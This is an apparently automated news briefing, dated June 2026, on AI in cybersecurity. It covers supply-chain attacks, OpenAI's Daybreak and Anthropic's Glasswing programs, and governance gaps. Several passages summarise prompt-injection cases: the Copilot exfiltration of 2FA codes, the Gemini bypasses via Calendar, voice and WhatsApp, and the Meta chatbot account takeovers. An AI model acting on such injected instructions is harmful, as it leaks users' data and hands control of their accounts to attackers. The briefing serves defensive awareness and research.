AI as Attack Tool and Attack Target: May 2026 Cybersecurity Moment · history

Version 19

2026-06-23 08:15 UTC · 615 items

Changes since v18

OpenAI's Daybreak launch on June 22 is the major new development: GPT-5.5-Cyber achieves 85.6% on CyberGym — the highest single-model score measured and above Mythos 5 — with Trusted Access for Cyber agreements across seven governments and a 30M-commit Codex Security scan record, making OpenAI a major new actor in this thread for the first time [^32516][^32657]. Role confusion research reported by Willison adds a structural mechanism for why prompt injection defenses keep failing (style-based privilege parsing rather than genuine role perception), quantifies a partial mitigation (destyling drops success from 61% to 10%), and deepens his earlier structural critique [^32628]. The AuthMind/CETAS governance critique now applies to both Glasswing and Daybreak, as OpenAI's program is similarly outside CAISI review.

What

AI is being weaponized by attackers and exploited as an attack surface, while two competing frontier-AI defensive programs — Anthropic's Glasswing/Mythos and OpenAI's newly launched Daybreak/GPT-5.5-Cyber — operate under self-certified access controls with no common governance standard or external audit [19][22]. The Mini Shai-Hulud supply chain campaign compromised 1,000+ SaaS environments and ~3,800 GitHub repositories [1][2]; a maximum-critical M365 Copilot vulnerability allowed 2FA theft via prompt injection [8]; and Google sued the Chinese Outsider Enterprise for $88/week phishing-as-a-service linked by the FBI to 3.87 million stolen credit card numbers [16]. OpenAI's GPT-5.5-Cyber achieved 85.6% on CyberGym — the highest single-model score measured, above Claude Mythos 5 — with Trusted Access for Cyber government partnerships across seven countries [22][24]. Role confusion research reported by Willison adds a structural explanation for why prompt injection defenses keep failing: LLMs parse privilege from text style rather than prompt position, and changing that style alone drops attack success from 61% to 10% [9].

Why it matters

Two of the highest-scoring offensive cyber tools ever benchmarked are now deployed under self-certified access programs with no external audit or common governance framework, while the structural vulnerability enabling most documented LLM attacks — models cannot reliably distinguish trusted from untrusted input — remains unresolved. Autonomous AI cyber capability is doubling roughly every 4.7 months [20], and the frameworks defenders rely on lack coverage for the attack mode this capability class enables [23].

Open questions

Ars Technica reports LLM providers have no fundamental fix for prompt injection [8]; role confusion research identifies style-based privilege parsing as the structural cause and destyling as a partial mitigation [9] — has any major provider announced an architectural response, or are defenses still per-vector patches?
OpenAI restricts GPT-5.5-Cyber to 'verified defenders with authorized workflows' and Anthropic's Glasswing has structured partner access, but neither program is subject to CAISI review [22][19][25] — is any common governance standard for frontier cyber AI deployment being developed?
The CSA confirmed both MITRE ATT&CK and MITRE ATLAS lack coverage for autonomous agentic orchestration [23] — have either framework bodies publicly responded or committed to a timeline for addressing it?
OpenAI argues AI has shifted the bottleneck from finding to patching vulnerabilities [22] — if this holds equally for attackers, what does deploying the highest-scoring CyberGym model imply for net offense-defense balance?

Narrative

The Mini Shai-Hulud supply chain campaign, launched by threat actor TeamPCP on May 11, 2026, compromised more than 1,000 SaaS environments [1], stole approximately 3,800–4,000 GitHub internal repositories via a poisoned VS Code extension [2][3], and breached 30 EU institutions via the Trivy container scanner [4]. Concurrent campaigns hit adjacent developer trust surfaces: an AntV ecosystem attack faked Sigstore provenance badges across 600+ packages [5], TrapDoor compromised 34+ packages across npm, PyPI, and crates.io [6], and 73 Microsoft-signed packages contained credential-stealing code that activated when developers opened them in AI coding agents [7]. GitHub removed the packages and described the action as a terms-of-service violation; Ars Technica argued that framing misled users about potential system compromise.

AI-connected products are under attack at multiple layers. A maximum-critical vulnerability in Microsoft 365 Copilot allowed attackers to steal 2FA codes and sensitive email data by embedding instructions in third-party content Copilot processes, using HTML img and form tags to route stolen data to attacker-controlled servers [8]. Ars Technica reports providers have responded with ad hoc guardrails rather than any architectural fix, characterizing current LLMs as having incurable gullibility to injection [8]. Role confusion research reported by Simon Willison provides a structural explanation: LLMs parse whether text is privileged based on its style rather than its actual position in the prompt hierarchy, and simply changing the style of injected text — a change nearly invisible to humans — drops average attack success from 61% to 10% [9]. Willison concludes that without genuine role perception in LLM architectures, injection defense is a perpetual whack-a-mole game. SafeBreach has documented three separate bypasses of Google Gemini's defenses via voice injection, Calendar invites, and WhatsApp Fake Context Alignment across six messaging platforms [10][11][12]. Meta issued an emergency patch after its AI support chatbot was exploited to take over high-profile Instagram accounts, including the Obama White House account; Willison argued the core failure was Meta granting account-modification authority without identity verification, not prompt injection per se [13][14].

AI is also being deployed at scale to run attacks with minimal technical skill. Google sued the Chinese Outsider Enterprise network for operating phishing-as-a-service toolkits on Telegram at $88/week, with 290+ pre-built templates requiring no coding skill and including instructions for using Gemini to build fake websites impersonating Google, YouTube, banks, and government agencies [15][16]. The FBI links the network to 3.87 million stolen credit card numbers and an estimated $1.9 billion in losses since July 2023 [16]. Anthropic's Frontier Red Team found corroborating aggregate data across 832 banned malicious accounts: 67.3% used AI to write malware, AI use in post-compromise attack phases rose 8.9%, and medium-to-high risk actors grew from 33% to 56% — roughly a 1.7-fold increase — with traditional signals no longer reliably separating sophisticated from novice attackers [17][18].

Two competing frontier AI programs are now deployed for defense with contested governance. Anthropic's Project Glasswing operates at approximately 200 partners in 15+ countries across critical infrastructure sectors, with Claude Mythos as the first AI to autonomously complete both UK offensive cyber ranges [19][20]. OpenAI launched Daybreak on June 22, including GPT-5.5-Cyber — which achieves 85.6% on CyberGym, the highest single-model score measured and above Mythos 5 — and Codex Security, which has scanned 30 million commits across 30,000+ codebases since March with over 70,000 findings manually confirmed fixed [21][22]. OpenAI signed Trusted Access for Cyber agreements with Australia, Canada, France, Germany, Japan, South Korea, and EU institutions including ENISA, restricts GPT-5.5-Cyber to verified defenders with authorized workflows, and argues that AI has shifted the bottleneck from finding vulnerabilities to patching them at AI-accelerated speed [22]. Neither Glasswing nor Daybreak is subject to CAISI review, and the Cloud Security Alliance has confirmed that both MITRE ATT&CK and MITRE ATLAS lack coverage for the autonomous agentic orchestration attack mode both programs enable [23].

Timeline

2026-05-05: NIST's CAISI formalized as US pre-deployment AI compliance gate with agreements covering Google, Microsoft, and xAI [31]
2026-05-11: TeamPCP launches Mini Shai-Hulud; 160+ npm and PyPI packages compromised; two OpenAI employee devices breached with code-signing certificates exfiltrated [32][33][34]
2026-05-11: Google GTIG intercepts the first confirmed criminal AI-generated zero-day targeting a hardcoded 2FA trust assumption [26][35][36]
2026-05-13: AISI evaluates Claude Mythos Preview as first AI to autonomously complete both UK offensive cyber ranges; autonomous AI cyber capability doubling every 4.7 months [32][37][20]
2026-05-18: TeamPCP advertises Mistral AI source code — 450 repositories — for sale at $25,000; Mistral confirms impact [38][39][40]
2026-05-20: GitHub confirms theft of approximately 3,800–4,000 internal repositories via a poisoned Nx Console VS Code extension [2][3][41]
2026-05-24: CERT-EU confirms European Commission breach across 30 EU institutions via Trivy; Mandiant quantifies 1,000+ SaaS compromises; TrapDoor hits 34+ packages; AntV ecosystem fakes Sigstore badges across 600+ packages [4][1][6][5]
2026-05-26: Starlette/ASGI critical vulnerability affects 325M weekly downloads including MCP servers; Microsoft patches four Copilot CVEs following documented data exfiltration [42][43][44]
2026-05-29: Meta issues emergency patch after its AI support chatbot is exploited to take over high-profile Instagram accounts including the Obama White House account [13][14]
2026-06-02: Anthropic expands Project Glasswing to ~200 partners in 15+ countries; reports 10,000+ critical flaws found; releases Claude Security on Opus 4.8 [19]
2026-06-03: Anthropic FRT publishes empirical data on 832 banned attackers: medium-to-high risk actors up 1.7-fold; AI use in post-compromise phases rose 8.9%; MITRE ATT&CK agentic gap identified [17][18]
2026-06-04: SafeBreach documents third Gemini bypass via WhatsApp 'Fake Context Alignment'; Google DeepMind documents agent-detecting malicious websites across six attack types [12][27][10][11]
2026-06-05: Simon Willison introduces 'Lethal Trifecta' framework; argues OpenAI Lockdown Mode addresses only the exfiltration leg of the structural condition enabling LLM data theft [28]
2026-06-08: 73 Microsoft-signed packages with AI-agent-triggered credential stealers blocked; GitHub describes removal as a terms-of-service violation [7]
2026-06-11: CSA gap analysis confirms neither MITRE ATT&CK nor MITRE ATLAS fully covers autonomous agentic orchestration [23]
2026-06-12: Google sues Chinese Outsider Enterprise for using Gemini to run phishing-as-a-service: $88/week, 290+ templates, $1.9B in estimated losses, 3.87M stolen credit card numbers per FBI [15][45][16]
2026-06-16: Ars Technica reports maximum-critical M365 Copilot vulnerability allowed 2FA code theft via prompt injection; researchers characterize prompt injection as structurally unfixable in current LLMs [8]
2026-06-22: OpenAI launches Daybreak: GPT-5.5-Cyber achieves 85.6% on CyberGym (highest single-model score, above Mythos 5); Codex Security has scanned 30M+ commits; Trusted Access for Cyber signed with 7 governments including ENISA [21][22][24]
2026-06-22: Role confusion research reported by Willison: LLMs parse privilege from text style rather than prompt position; destyling drops injection success from 61% to 10%; defense characterized as 'perpetual whack-a-mole' without genuine role perception [9]

Perspectives

SafeBreach Labs

Has documented three successful bypasses of Google Gemini's prompt injection defenses: voice/audio injection, Google Calendar invites, and WhatsApp 'Fake Context Alignment' across six messaging platforms.

Evolution: Consistent; the pattern of repeated circumvention of individually patched defenses independently reinforces the role confusion structural critique.

[10][11][12]

Anthropic

Expanding Project Glasswing to ~200 partners under a proactive-defense rationale — controlled deployment under structured conditions is preferable because Mythos-class capability will be widely available within 6–12 months — while FRT empirical data documents AI democratizing sophisticated post-compromise attack techniques.

Evolution: GPT-5.5-Cyber's reported outperformance of Mythos 5 on CyberGym (OpenAI's benchmark, not independently verified) suggests the competitive timeline Anthropic cited for early deployment is real, though it also means Anthropic's capability lead has narrowed.

[19][17][18][24]

OpenAI

Launched Daybreak on June 22 with GPT-5.5-Cyber (85.6% CyberGym, highest single-model score, above Mythos 5) and Patch the Planet; argues AI has shifted the bottleneck from discovering to patching vulnerabilities; restricts GPT-5.5-Cyber to verified defenders with authorized workflows under Trusted Access for Cyber agreements with seven governments.

Evolution: New to this thread; enters as a major actor deploying frontier cyber AI under a human-oversight-centered, defense-first framing that closely parallels Anthropic's Glasswing rationale but similarly lacks an independent governance structure.

[21][22][24]

GitHub / Microsoft

Characterized the theft of ~3,800 internal repositories as limited impact, described removal of 73 malicious packages as a terms-of-service violation, and patched a maximum-critical Copilot vulnerability enabling 2FA theft that researchers frame as a symptom of prompt injection's structural unfixability.

Evolution: Consistent; the June 16 Copilot disclosure extends a pattern of per-incident responses without addressing the structural critique.

[2][7][8]

Google (GTIG / DeepMind / Legal)

GTIG confirmed the first criminal AI-generated zero-day; DeepMind documented malicious websites targeting AI agents; Google Legal sued Outsider Enterprise for using Gemini to deliver phishing-as-a-service causing an estimated $1.9 billion in losses per FBI attribution.

Evolution: Consistent; the Outsider Enterprise lawsuit adds a legal enforcement dimension while illustrating that Google's own model was weaponized against users.

[26][27][15][16]

Simon Willison

Introduced the 'Lethal Trifecta' (private data access + untrusted content + exfiltration channel) as the structural condition enabling LLM data theft; now reports that LLMs parse privilege from text style rather than prompt position, meaning injection defense is a 'perpetual whack-a-mole game' unless LLMs achieve genuine role perception.

Evolution: Role confusion research deepens his structural critique: the problem is not just the trifecta of enabling conditions but the absence of genuine role perception in current LLM architectures.

[28][13][9]

AISI (UK AI Safety Institute)

Claude Mythos is the first AI to autonomously complete both UK offensive cyber ranges; autonomous AI cyber capability is doubling approximately every 4.7 months, warranting urgent governance attention.

Evolution: Consistent; OpenAI's reported CyberGym outperformance of Mythos 5, if independently confirmed, would indicate the capability ceiling has risen further since AISI's evaluation.

[20][29]

AuthMind + Turing Institute CETAS

The CAISI voluntary framework evaluates only submitted models, not deployment programs; Anthropic's Glasswing expansion to ~200 partners without CAISI review is precisely the unaudited frontier deployment their governance critique describes.

Evolution: OpenAI's Daybreak launch with seven government partnerships, also outside CAISI review, extends the same governance critique to a second major actor simultaneously.

[25][30][29][22]

Tensions

Ars Technica argues current LLMs have no fundamental fix for prompt injection; role confusion research confirms the structural cause (style-based privilege parsing) and identifies a partial mitigation — destyling drops attack success from 61% to 10% — that no provider has announced adopting [8][9]. [8][9]
GitHub described removal of 73 malicious Microsoft-signed packages as a terms-of-service violation; Ars Technica argues this framing misled users about potential system compromise, consistent with GitHub's earlier minimized characterization of the internal repository theft [7][2]. [7][2]
Anthropic argues deploying Glasswing to ~200 partners under controlled conditions is preferable to waiting for competitors to deploy Mythos-class capability without safeguards; AuthMind and CETAS argue this expansion without CAISI review is precisely the unaudited frontier deployment their governance critique describes [19][25]. [19][25]
Willison concludes OpenAI Lockdown Mode's existence implies ChatGPT in default settings does not robustly block determined exfiltration; OpenAI has not directly contested this characterization [28]. [28]
Willison argues the Meta AI Instagram exploit 'hardly even qualifies as prompt injection' — the real failure was Meta granting account-modification authority without identity verification — while Ars Technica frames it as a prompt injection attack demonstrating AI's susceptibility to manipulation [13][14]. [13][14]
OpenAI's Daybreak and Anthropic's Glasswing both claim structured defender-only access for frontier cyber AI, but neither is subject to CAISI review or a common external standard; governance critics argue two programs competing on capability while self-certifying access controls creates the governance gap CAISI was designed to prevent [22][19][25]. [22][19][25]

Sources

[1] TeamPCP Supply Chain Campaign: Update 006 - CERT-EU Confirms European Commission Cloud Breach, Sportradar Details Emerge, and Mandiant Quantifies Campaign at 1,000+ SaaS Environments — reactive:ai-security-nexus
[2] Nx Console 18.95.0 Incident: How TeamPCP Breached GitHub — reactive:ai-security-nexus
[3] GitHub just confirmed that attackers stole about 3,800 internal repositories after a poisoned VS Code extension compromi… — Rohan Paul Twitter (2026-05-20)
[4] European Commission cloud breach: a supply-chain compromise — reactive:ai-security-nexus
[5] Mini Shai-Hulud Returns: 600+Malicious npm Packages Fake Sigstore Badges in AntV Ecosystem Attack — reactive:ai-security-nexus
[6] TrapDoor Crypto Stealer Supply Chain Attack Hits 34 Packages... — reactive:ai-offensive-cyber
[7] For the 2nd time in weeks, Microsoft packages laced with credential stealer — Ars Technica AI (2026-06-08)
[8] Critical Copilot vulnerability allowed hackers to steal 2FA code from users — Ars Technica AI (2026-06-16)
[9] Prompt Injection as Role Confusion — Simon Willison (2026-06-22)
[10] Exploiting Gemini via Prompt Injection | SafeBreach Original Research — reactive:ai-security-nexus
[11] Invitation Is All You Need: Hacking Gemini | SafeBreach — reactive:ai-security-nexus
[12] 😺 Google Gemini got hijacked via WhatsApp — The Neuron (2026-06-04)
[13] Hackers duped Meta AI support chatbot to steal celebrity Instagram accounts — Ars Technica AI (2026-06-01)
[14] Hackers Simply Asked Meta AI to Give Them Access to High-Profile Instagram Accounts. It Worked — Simon Willison (2026-06-01)
[15] Google sues Chinese cybercrime network that used Gemini to automate scams — Ars Technica AI (2026-06-12)
[16] 😺 Google sued the people spamming your phone — The Neuron (2026-06-16)
[17] What we learned mapping a year’s worth of AI-enabled cyber threats — Anthropic News (2026-06-03)
[18] Gap: Anthropic mapped 832 banned accounts onto MITRE ATT&CK. AI in the back half of attacks jumped 8.9%; phishing dr... — reactive:ai-security-nexus (2026-06-14)
[19] Expanding Project Glasswing — Anthropic News (2026-06-02)
[20] Our evaluation of Claude Mythos Preview's cyber capabilities — reactive:frontier-ai-cyber-capabilities
[21] Patch the Planet: a Daybreak initiative to support open source maintainers — OpenAI Blog (2026-06-22)
[22] Daybreak: Tools for securing every organization in the world — OpenAI Blog (2026-06-22)
[23] MITRE ATT&CK and ATLAS Agentic Gap Analysis - Lab Space — reactive:ai-security-nexus
[24] OpenAI’s new GPT-5.5-Cyber just beat Mythos 5 on CyberGym. — Rohan Paul Twitter (2026-06-22)
[25] When a Lab Withholds Its Best Model: What the Claude Mythos System Card Signals for Cybersecurity — reactive:ai-security-nexus
[26] Google Researchers Detect First AI-Built Zero-Day Exploit in Cyberattack - Bloomberg — reactive:ai-offensive-cyber
[27] This Google DeepMind’s paper is a serious warning for anyone using autonomous agents today. — Rohan Paul Twitter (2026-06-04)
[28] OpenAI Help: Lockdown Mode — Simon Willison (2026-06-05)
[29] AISI: autonomous AI cyber capability now doubling every 4.7 months — reactive:ai-offensive-cyber
[30] Claude Mythos: What Does Anthropic's New Model Mean for the ... — reactive:ai-security-nexus
[31] US government expands vetting of frontier AI models for security risks — reactive:ai-security-nexus
[32] Our response to the TanStack npm supply chain attack — OpenAI Blog (2026-05-13)
[33] Mini Shai-Hulud: TeamPCP compromette 160+ pacchetti npm e PyPI in un supply chain attack che ha colpito TanStack, Mistra... — reactive:ai-security-nexus (2026-05-19)
[34] A Self-Spreading Supply Chain Attack Compromises TanStack npm ... — reactive:ai-security-nexus
[35] Google Detects First AI-Generated Zero-Day Exploit - SecurityWeek — reactive:ai-offensive-cyber
[36] Google spotted an AI-developed zero-day before attackers could use it | CyberScoop — reactive:ai-offensive-cyber
[37] How fast is autonomous AI cyber capability advancing? — reactive:ai-offensive-cyber (2026-05-13)
[38] TeamPCP vende repo Mistral AI dopo attacco TanStack su OpenAI — reactive:ai-security-nexus (2026-05-18)
[39] Hackers threaten to leak Mistral files online — AI giant confirms breach, but not what data is involved | TechRadar — reactive:ai-offensive-cyber
[40] TeamPCP Claims Sale of Mistral AI Repositories Amid Mini Shai ... — reactive:ai-security-nexus
[41] GitHub Says 3,800 Repositories Breached—TeamPCP Hackers ... — reactive:ai-security-nexus
[42] Millions of AI agents imperiled by critical vulnerability in open source package — Ars Technica AI (2026-05-26)
[43] Microsoft 365 Copilot Information Disclosure CVEs (CVE-2026-26129, CVE-2026-26164, CVE-2026-33111) | PointGuard AI — reactive:ai-security-nexus
[44] CVE-2026-26137: Microsoft 365 Copilot SSRF Vulnerability — reactive:ai-security-nexus
[45] Google Sues to Stop Chinese Cybercrime Group from Using Its A.I. — reactive:ai-security-nexus